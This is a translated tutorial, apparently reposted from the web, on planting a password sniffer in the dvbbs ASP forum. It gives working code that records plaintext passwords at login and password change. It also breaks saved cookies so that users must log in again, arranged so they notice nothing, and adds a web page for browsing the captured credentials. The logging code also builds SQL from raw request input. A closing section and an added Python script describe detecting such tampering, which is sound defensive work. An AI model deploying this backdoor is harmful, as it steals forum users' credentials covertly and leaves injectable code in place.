Add a password sniffer to the dynamic network forum (dvbbs)

Source: Internet
Author: User

With its powerful and comprehensive functions, and because it is free for individual users, the dynamic network pioneer forum stands out among the many online forums, and many people regard it as the best choice for their own forum. However, the new version of the forum uses irreversible MD5 encryption for user passwords. Even administrators cannot look up an individual user's password; only the encrypted result can be seen in the database.

First, the login process. The user enters an account ID and password, the MD5 function is called to encrypt the entered password, and the result is compared with the value stored in the database. If they match, the login succeeds and the personal information is saved in a cookie.

Now we will add a password-recording function to the forum ourselves.

Look at the source of login.asp, the file that handles login. The verification process directly calls the chklogin() function. Following chklogin(), the first statements check whether the user's input is complete, and then comes:

password = md5(trim(checkstr(request("password"))))

Here the MD5 function is called to encrypt the password submitted by the user. To record the unencrypted password, our code has to go in front of this statement. Don't rush to write the code, though: we need to store the password in the database, so we should first create our own table there.

Open the forum's database file. We only need to save two items in this table, the user name and the password, so choose "Create table with designer", enter the field names user and pass, and set the data type to Text. Save the table and name it hacker.

Next we go to the ASP program and add the user name and password to the table we just created. We only need to add the following two sentences before the line of code above:

'First query the database and check whether the user's password has already been recorded, to avoid adding it twice
Set rs = conn.execute("select user from hacker where user='" & request("username") & "'")
If rs.eof and rs.bof then
  'If not, insert the user name and password into the table we just created
  sql = "insert into hacker (user, pass) values ('" & request("username") & "','" & request("password") & "')"
  conn.execute(sql)
  rs.close
Else
End if

With the code above, the user name and password are automatically added to the hacker table we created each time a user logs in.

However, the BBS also has a feature that saves login information in a cookie for one day, one month, or one year, so that users do not need to enter their account on every visit. Of course, we do not want to miss these users' passwords, so we need a way to invalidate their cookies so that they must log in through the modified file.

The forum's cookie-checking code is in the file \inc\const.asp. Let's open it and look at its source.

membername = checkstr(request.cookies("aspsky")("username"))
memberclass = checkstr(request.cookies("aspsky")("userclass"))
memberword = checkstr(request.cookies("aspsky")("password"))

These statements read the information stored in the user's cookie. We only need to change any one variable to make the cookie login fail. I added the following code after the second sentence:

'Check whether the account has been recorded. If not, change the password variable to the user name.
Set rs = conn.execute("select user from hacker where user='" & membername & "'")
If rs.eof and rs.bof then
  memberword = checkstr(request.cookies("aspsky")("username"))
  rs.close
Else
  'If it has been recorded, the cookie verifies normally, so the cookie is not permanently invalidated, which would arouse the user's suspicion.
  memberword = checkstr(request.cookies("aspsky")("password"))
End if

The code for recording user accounts is now basically complete. As soon as a user logs in, the account is added directly to our database. However, we have missed one point: if the user changes the password, the password we recorded becomes stale, and our recording code cannot tell that the password has been modified. So we also need to modify the password-change program, modifypsw.asp.

rs("userpassword") = password
rs("quesion") = quesion
rs("answer") = answer
rs.update

The code above updates the password. Let's analyze it: the password can only be changed after the user has logged in, and since the user has logged in, the password is already recorded in our database. Whatever the new password is, we only need to update our database, so add the following two sentences before the four above:

'Note that the password variable is not used here, because it has already been encrypted by MD5.
sql = "update hacker set pass='" & request("psw") & "' where user='" & membername & "'"
conn.execute(sql)

Finally, it is impractical to open the database every time we want to look up a user's password, so we need to write an ASP program that queries the passwords through a web interface.

The following is my own ASP code. I borrowed the fuzzy-query function from the dynamic network forum. You can search for a user name directly to get the account, or display all the recorded accounts.

<!--#include file="conn.asp"-->
<!--#include file="inc/const.asp"-->
<%
'The forum's fuzzy-search function translate()
Public Function translate(sourcestr, fieldstr)
  Dim sourcelist
  Dim resultstr
  Dim i, j
  If instr(sourcestr, " ") > 0 then
    Dim isoperator
    isoperator = true
    sourcelist = split(sourcestr)
    '----------------------------------------------------
    rem response.write "Num:" & cstr(ubound(sourcelist)) & "<br>"
    For i = 0 to ubound(sourcelist)
      rem response.write i
      Select case ucase(sourcelist(i))
      Case "AND", "&"
        resultstr = resultstr & " and "
        isoperator = true
      Case "OR", "|"
        resultstr = resultstr & " or "
        isoperator = true
      Case "NOT", "!"
        resultstr = resultstr & " not "
        isoperator = true
      Case "("
        resultstr = resultstr & " ( "
        isoperator = true
      Case ")"
        resultstr = resultstr & " ) "
        isoperator = true
      Case else
        If sourcelist(i) <> "" then
          If not isoperator then resultstr = resultstr & " and "
          If instr(sourcelist(i), "%") > 0 then
            resultstr = resultstr & " " & fieldstr & " like '" & replace(sourcelist(i), "'", "''") & "' "
          Else
            resultstr = resultstr & " " & fieldstr & " like '%" & replace(sourcelist(i), "'", "''") & "%' "
          End if
          isoperator = false
        End if
      End select
      rem response.write resultstr + "<br>"
    Next
    translate = resultstr
  Else 'single condition
    If instr(sourcestr, "%") > 0 then
      translate = " " & fieldstr & " like '" & replace(sourcestr, "'", "''") & "' "
    Else
      translate = " " & fieldstr & " like '%" & replace(sourcestr, "'", "''") & "%' "
    End if
  End if
End Function
%>
<%
'Check whether a fuzzy query was submitted. If so, query the database.
If request.form("ID") <> "" then
  Dim key
  key = request.form("ID")
  Set rs = conn.execute("select user, pass from hacker where (" & translate(key, "user") & ")")
'Check whether all accounts were requested. If so, query all records.
Else if request.querystring("ID") <> "all" then
  Else
    Set rs = conn.execute("select * from hacker")
  End if
End if
%>
<div align="center">
  <p><strong>query password</strong></p>
  <form name="form1" method="post" action="">
    User Name:
    <input name="ID" type="text" size="12">
    <input type="submit" name="Submit" value="Search">
  </form>
  <p><a href="test.asp?id=all">show all</a></p>
  <table width="300" border="1" cellspacing="0" cellpadding="0">
<%
'Check whether a query was made. If not, prompt for a query method; otherwise show the query result.
If request.querystring("ID") <> "" or request.form("ID") <> "" then %> <tr>
      <td width="150"><div align="center">username</div></td>
      <td width="150"><div align="center">password</div></td>
    </tr>
<% Do while (not rs.eof) %> <tr>
      <td><%=rs("user")%></td>
      <td><%=rs("pass")%></td>
    </tr>
  <% rs.movenext
  Loop
  rs.close
  else
  response.write("<tr><td><center>select a query method</center></td></tr>")
  end if
  %>
  </table>
</div>

Other ideas:

If the server is hacked, we must prevent the forum from being modified and turned into a tool for others to obtain passwords, so we need to consider the methods hackers commonly use.

First, we need to check at any time whether the database is complete, and ensure that the database is distributed in a timely manner. It is now popular on the Internet to change the database file's suffix to .asp; together with adding a table that cannot be deleted, this can effectively prevent the database from being downloaded by others. By the same token, hackers are likely to change the suffix of their own database files to .asp as well, so that they hide among the many ASP files. Inexperienced administrators generally find this hard to spot, so the files on the entire website should be checked regularly. If ASP files appear for no reason, it is likely that someone is at work behind the scenes.

Hackers can not only place their own ASP files on the server, but also hide their ASP code inside existing ASP files. The browser can send querystring variables to an ASP file, so if the ASP file contains a condition statement such as: If request.querystring("variable") = "" then ...... this simple method is hard to guard against. Because of the convenience of the database, administrators seldom check whether files on the server have been modified. Therefore, it is necessary to check regularly whether files have been modified.
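
The regular checks recommended above (files that appear or change for no reason, and database files hiding under an .asp suffix) can be automated. The following is an added example, not part of the original article or of the forum's code; the function names, the finding labels and the "password input used on a line without md5()" heuristic are assumptions of this example, and the sample tree in demo() is constructed.

```python
import hashlib, os, re, tempfile

JET_MAGIC = (b"Standard Jet DB", b"Standard ACE DB")  # Access file header, offset 4
# Heuristic (an assumption of this example): password input used on a line without md5()
RAW_PW = re.compile(rb'request(\.form|\.querystring)?\s*\(\s*"(password|psw)\s*"\s*\)', re.I)
HASHED = re.compile(rb"md5\s*\(", re.I)

def snapshot(root):
    """Map relative path -> SHA-256 for every file under the web root."""
    out = {}
    for folder, _, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, "rb") as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            out[os.path.relpath(path, root).replace(os.sep, "/")] = digest
    return out

def audit(root, baseline):
    """Compare root with a trusted baseline; return sorted (finding, path) pairs."""
    findings = set()
    for rel, digest in snapshot(root).items():
        if rel not in baseline:
            findings.add(("new-file", rel))
        elif baseline[rel] != digest:
            findings.add(("modified", rel))
        if rel.lower().endswith(".asp"):
            with open(os.path.join(root, rel), "rb") as f:
                data = f.read()
            if data[4:19] in JET_MAGIC:  # an Access database renamed to .asp
                findings.add(("database-named-asp", rel))
            if any(RAW_PW.search(l) and not HASHED.search(l) for l in data.splitlines()):
                findings.add(("raw-password-use", rel))
    return sorted(findings)

def demo():
    """Constructed sample tree: take a baseline, make two changes, audit."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        hashed = b'password = md5(trim(checkstr(request("password"))))\n'
        write("login.asp", hashed)
        write("index.asp", b"<% response.write now() %>\n")
        baseline = snapshot(root)  # taken while the site is known to be clean
        write("login.asp", b'logged = request("password")\n' + hashed)
        write("help.asp", b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64)
        return audit(root, baseline)

if __name__ == "__main__": print(demo())
```

Keep the baseline somewhere the web server account cannot write, and re-take it only after a reviewed upgrade of the forum files.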
